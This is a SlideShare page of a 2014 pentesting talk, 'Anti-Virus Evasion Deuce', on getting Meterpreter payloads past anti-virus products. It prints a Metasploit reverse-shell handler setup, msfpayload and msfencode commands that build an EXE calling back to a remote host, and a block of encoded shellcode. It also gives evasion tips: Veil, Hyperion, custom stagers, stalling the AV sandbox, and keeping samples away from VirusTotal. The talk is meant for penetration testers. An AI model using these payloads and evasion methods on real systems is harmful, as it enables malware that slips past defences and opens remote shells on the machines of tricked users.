SlideShare a Scribd company logo

2600 av evasion_deuce

Db Cooper
Db Cooper
Technology
1 of 26
Anti-Virus Evasion Deuce January 3, 2014 Joe Testa
Anti-Virus Got Better     Last January I gave a talk on AV evasion. I showed how to craft a custom Meterpreter payload. Some AV products catch that now! This presentation shows how to get back in business.
Anti-Virus Got Better    A lot of built-in exploits don't work anymore because of AV. You now have to re-write exploits yourself. Example: unprotected Tomcat installations can be taken over with the tomcat_mgr_deploy module.  Without AV, you normally get SYSTEM or root.  With AV, you get disappointment.
Goals    Aside from bypassing AV for software exploits, pentesters need a way to conduct social engineering. Ideally, we would like a reliable way to generate EXE files that run Meterpreter when the user is tricked. You can write your own custom code, but then how do you safely and reliably steal hashes, hijack tokens, etc?
Payload Overview    Usually, the EXE doesn't contain Meterpreter itself. Its a stager, whose only job is to connect back to your Metasploit server and execute what it returns. For the last two years, pretty much all the Metasploit stagers get caught, no matter how much you encode them.
Payload Server  The server is set up with: msf > use exploit/multi/handler msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
IDS/IPS Evasion   An interesting trick to confuse network IDS/IPS is to encode the payload as it travels over the network. One way is to set StageEncoder on the server.    You can use shikata_ga_nai, etc. Last I checked, this is very slow! Another way is to use the windows/meterpreter/reverse_tcp_rc4 payload.  You set the RC4 key to encrypt communications.
Simple Payloads  The most basic way to create an EXE is like this: $ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 X > payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"} $ ls -l payload.exe -rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe $ file payload.exe payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Simple Payloads  Up until August 2011, you could bypass AV by encoding like so: $ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R | msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6) [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7) [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8) [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
Simple Payloads  Last year I talked about shellcodeexec.   https://github.com/inquisb/shellcodeexec The punchline is that it takes alphanumericencoded shellcode, stuffs it into memory, and executes it: C:Documents and Settingsroot>sce.exe PYIIIIIIIIIIIIIIII7Q ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc 1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT 45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV 9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p
Formerly Good Payload  Here's how the alphanumeric shellcode is created: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.2.3.4 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX [*] x86/alpha_mixed succeeded with size 634 (iteration=1) PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa xOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1 yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNk f8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJ nkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPh q9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQ slNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qz s4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0 Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA
Formerly Good Payload  Microsoft Security Essentials catches this!
Better Payloads  There is a tool called pyinjector which reimplements the essentials of shellcodeexec in Python.    Creates a writeable and executable memory buffer, stuffs code into it, executes it. You use pyinstaller (http://www.pyinstaller.org/) to create an EXE. Available at: https://www.trustedsec.com/files/pyinjector.zip
Better Payloads  There is a tool called Hyperion which encrypts an EXE with AES-128.   The output EXE brute-forces part of the key on startup.   http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip This prevents AV from extracting the key and decrypting the binary. The stub code for decryption is static!  It is open source though...
Best Payloads  The Veil project is a toolkit for creating payloads that evade AV.    https://www.veil-evasion.com/ It is a relatively new project, but is actively maintained and developed. Currently has 22 payloads.
Best Payloads Current Veil payloads: c/meterpreter/rev_tcp c/meterpreter/rev_tcp_service c/shellcode_inject/virtual c/shellcode_inject/void cs/meterpreter/rev_tcp cs/shellcode_inject/base64_substitution cs/shellcode_inject/virtual native/Hyperion native/backdoor_factory native/pe_scrambler powershell/shellcode_inject/download_virtual powershell/shellcode_inject/psexec_virtual powershell/shellcode_inject/virtual python/meterpreter/rev_http_contained python/meterpreter/rev_https_contained python/meterpreter/rev_tcp python/shellcode_inject/aes_encrypt python/shellcode_inject/arc_encrypt python/shellcode_inject/base64_substitution python/shellcode_inject/des_encrypt python/shellcode_inject/flat python/shellcode_inject/letter_substitution
Best Payloads  Veil and others seem very useful, but being open source is a bit of a weakness when it comes to AV evasion.    This is the same problem that Metasploit has. Nothing beats writing something yourself! Best method is to take what's out there, customize it, and keep it private.
Best Payloads   A blog post on the Veil homepage pointed to information on how to make your own Meterpreter stager. With shellcodeexec, the idea was to launch the generated stager to connect to the server, download Meterpreter, and execute it.   shellcodeexec → alphanumeric-encoded stager → Meterpreter Why not write your own stager from scratch?
Best Payloads  Someone showed how to write your own windows/meterpreter/reverse_tcp equivalent.    https://github.com/rsmudge/metasploit-loader Basically, you open a TCP connection to the Metasploit server, throw the bytes returned into an executable buffer. Prepend the buffer with a ”mov edi, socket_id” instruction, and jump to it.  Meterpreter will then use the existing TCP session.
Best Payloads    How do you customize it? One of the Metasploit developers mentioned that AV puts new binaries into a sandbox for the first N seconds. Do innocent things like read the registry, read some config files, compute digits of pi, etc.  Don't sleep to run down the clock!
VirusTotal   VirusTotal (http://www.virustotal.com/) lets you upload binaries to be scanned by 46 AV products. Its common knowledge that they pass on samples to AV vendors.   They know malware authors use it. Your target can pull down a signature in as little as one hour.
VirusTotal  vt-notify (https://github.com/mubix/vt-notify) uses the VirusTotal's API to check the SHA-1 hash of your payload.   If you don't get your own API key, it uses a built-in one.   Its been incorporated into Veil. This probably tips them off that its malware! Actually... this functionality as a whole was probably designed as a trap!
Building an AV Lab    The best way to check your payload is by building your own AV lab. VirusTotal has 46 products, but how many corporate environments use ”Kingsoft AV”? Symantec and McAfee seem to have the overwhelming market share.  Maybe throw in Kaspersky for good measure too...
Building an AV Lab   MSDN Operating Systems subscription is $700 for 1 year. Symantec Small Business Edition costs $60 for a 3 year subscription for 1 endpoint.  McAfee SaaS Endpoint Protection costs $52.  Make sure the AV products don't phone home!
Building an AV Lab    I'm now actively building this lab. Once its set up, I'm going to evaluate all these evasion tools. If anyone wants to test some payloads, just let me know!
Conclusion    To be a good pentester, you need to know how to bypass AV. Many built-in Metasploit modules no longer work. You have to re-write some or find alternatives. The success of your engagement can entirely depend upon how well you can adapt.  Being a programmer is extremely valuable!

Recommended

Nsa and vpn
Nsa and vpnNsa and vpn
Nsa and vpn
antitree
 
Docker Security
Docker SecurityDocker Security
Docker Security
antitree
 
Introduction to ethereum_public
Introduction to ethereum_publicIntroduction to ethereum_public
Introduction to ethereum_public
antitree
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
Tony Godfrey
 
Backtrack os 5
Backtrack os 5Backtrack os 5
Backtrack os 5
Ayush Goyal
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnology
CanSecWest
 
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
Leonardo Nve Egea
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 

Recommended

Nsa and vpn
Nsa and vpnNsa and vpn
Nsa and vpn
antitree
 
Docker Security
Docker SecurityDocker Security
Docker Security
antitree
 
Introduction to ethereum_public
Introduction to ethereum_publicIntroduction to ethereum_public
Introduction to ethereum_public
antitree
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
Tony Godfrey
 
Backtrack os 5
Backtrack os 5Backtrack os 5
Backtrack os 5
Ayush Goyal
 
Csw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnologyCsw2016 wang docker_escapetechnology
Csw2016 wang docker_escapetechnology
CanSecWest
 
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
Leonardo Nve Egea
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
XFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingXFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
Shakacon
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
Shakacon
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Shakacon
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
Dennis Maldonado
 
Backtrack
BacktrackBacktrack
Backtrack
One97 Communications Limited
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
Andy Lee
 
BackTrack5 - Linux
BackTrack5 - LinuxBackTrack5 - Linux
BackTrack5 - Linux
mariuszantal
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
VeilFramework
 
Nikto
NiktoNikto
Nikto
Sorina Chirilă
 
The FatRat
The FatRatThe FatRat
The FatRat
AjilSunny
 
Backtrack
BacktrackBacktrack
Backtrack
n|u - The Open Security Community
 
Getting started with open stack
Getting started with open stackGetting started with open stack
Getting started with open stack
Dan Radez
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short description
Jose Moruno Cadima
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
Bishop Fox
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
OpenShift & SELinux with Dan Walsh @rhatdan
OpenShift & SELinux with Dan Walsh @rhatdanOpenShift & SELinux with Dan Walsh @rhatdan
OpenShift & SELinux with Dan Walsh @rhatdan
OpenShift Origin
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the Empire
Jeremy Johnson
 
HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装
inaz2
 
Down by the Docker
Down by the DockerDown by the Docker
Down by the Docker
NotSoSecure Global Services
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
IOSR Journals
 
Security Handbook
Security Handbook Security Handbook
Security Handbook
Anthony Hasse
 

More Related Content

What's hot

Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Shakacon
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装
inaz2
 

What's hot (20)

Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
XFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingXFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Backtrack
BacktrackBacktrack
Backtrack
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
 
BackTrack5 - Linux
BackTrack5 - LinuxBackTrack5 - Linux
BackTrack5 - Linux
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
 
Nikto
NiktoNikto
Nikto
 
The FatRat
The FatRatThe FatRat
The FatRat
 
Backtrack
BacktrackBacktrack
Backtrack
 
Getting started with open stack
Getting started with open stackGetting started with open stack
Getting started with open stack
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short description
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
OpenShift & SELinux with Dan Walsh @rhatdan
OpenShift & SELinux with Dan Walsh @rhatdanOpenShift & SELinux with Dan Walsh @rhatdan
OpenShift & SELinux with Dan Walsh @rhatdan
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the Empire
 
HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装
 
Down by the Docker
Down by the DockerDown by the Docker
Down by the Docker
 

Similar to 2600 av evasion_deuce

Breaking av software
Breaking av softwareBreaking av software
Breaking av software
Joxean Koret
 
Breaking Antivirus Software
Breaking Antivirus SoftwareBreaking Antivirus Software
Breaking Antivirus Software
rahmanprojectd
 
Bypassing anti virus scanners
Bypassing anti virus scannersBypassing anti virus scanners
Bypassing anti virus scanners
martacax
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
Bypassing anti virus scanners
Bypassing anti virus scannersBypassing anti virus scanners
Bypassing anti virus scanners
martacax
 

Similar to 2600 av evasion_deuce (20)

Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Security Handbook
Security Handbook Security Handbook
Security Handbook
 
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
Breaking Antivirus Software - Joxean Koret (SYSCAN 2014)
 
Breaking av software
Breaking av softwareBreaking av software
Breaking av software
 
Breaking av software
Breaking av softwareBreaking av software
Breaking av software
 
Breaking Antivirus Software
Breaking Antivirus SoftwareBreaking Antivirus Software
Breaking Antivirus Software
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
Bypassing anti virus scanners
Bypassing anti virus scannersBypassing anti virus scanners
Bypassing anti virus scanners
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
 
Bypassing anti virus scanners
Bypassing anti virus scannersBypassing anti virus scanners
Bypassing anti virus scanners
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4
 
News Bytes - May by corrupt
News Bytes - May by corruptNews Bytes - May by corrupt
News Bytes - May by corrupt
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guide
 

Recently uploaded

IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 

Recently uploaded (20)

What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 

2600 av evasion_deuce

  • 2. Anti-Virus Got Better     Last January I gave a talk on AV evasion. I showed how to craft a custom Meterpreter payload. Some AV products catch that now! This presentation shows how to get back in business.
  • 3. Anti-Virus Got Better    A lot of built-in exploits don't work anymore because of AV. You now have to re-write exploits yourself. Example: unprotected Tomcat installations can be taken over with the tomcat_mgr_deploy module.  Without AV, you normally get SYSTEM or root.  With AV, you get disappointment.
  • 4. Goals    Aside from bypassing AV for software exploits, pentesters need a way to conduct social engineering. Ideally, we would like a reliable way to generate EXE files that run Meterpreter when the user is tricked. You can write your own custom code, but then how do you safely and reliably steal hashes, hijack tokens, etc?
  • 5. Payload Overview    Usually, the EXE doesn't contain Meterpreter itself. Its a stager, whose only job is to connect back to your Metasploit server and execute what it returns. For the last two years, pretty much all the Metasploit stagers get caught, no matter how much you encode them.
  • 6. Payload Server  The server is set up with: msf > use exploit/multi/handler msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
  • 7. IDS/IPS Evasion   An interesting trick to confuse network IDS/IPS is to encode the payload as it travels over the network. One way is to set StageEncoder on the server.    You can use shikata_ga_nai, etc. Last I checked, this is very slow! Another way is to use the windows/meterpreter/reverse_tcp_rc4 payload.  You set the RC4 key to encrypt communications.
  • 8. Simple Payloads  The most basic way to create an EXE is like this: $ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 X > payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"} $ ls -l payload.exe -rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe $ file payload.exe payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
  • 9. Simple Payloads  Up until August 2011, you could bypass AV by encoding like so: $ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R | msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6) [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7) [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8) [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
